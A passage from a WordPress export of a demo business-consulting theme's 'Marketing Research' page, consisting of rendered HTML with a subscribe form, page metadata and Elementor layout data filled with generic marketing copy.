		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>898</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:28:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:28:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[marketing-research]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"317e6d4","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"efbeefb","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"f82bab9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"d516166","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"611317c","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9a4f025","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"35a9e19","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34206bb","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"04ace53","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"1ce0cf2","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"725e97b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"d809972","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d64ec6","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"19280c6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7205aed","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#FF8F3E","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"84e6cfd","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"25b91f9","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9d81515","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"42baa2b","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3ee3642","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5b13621","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8317533","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c212bb7","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"47aaa4f","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"72dea83","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service.png","id":913},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"fe0af4f","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"c0a1253","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #ff8f3e;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"94af6c9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4e4cb68","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"1ebc8a8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d2f32e","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"83881c6","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"fcdefbb","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"82d1d05","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"2301f15","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"86a5b1b","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"cb92309","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"2b9345c","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"798f2b3","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"46c4dc2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"a5a16d3","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"e084289","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"b3e48c6","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"492df2b","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"d978f37","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf.jpg","id":955},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"c039bfa","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"8d056a9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d3585b3","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#FF8F3E","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"3d213cc","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"1ece4fe","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"ecc0e39","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"3790478","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}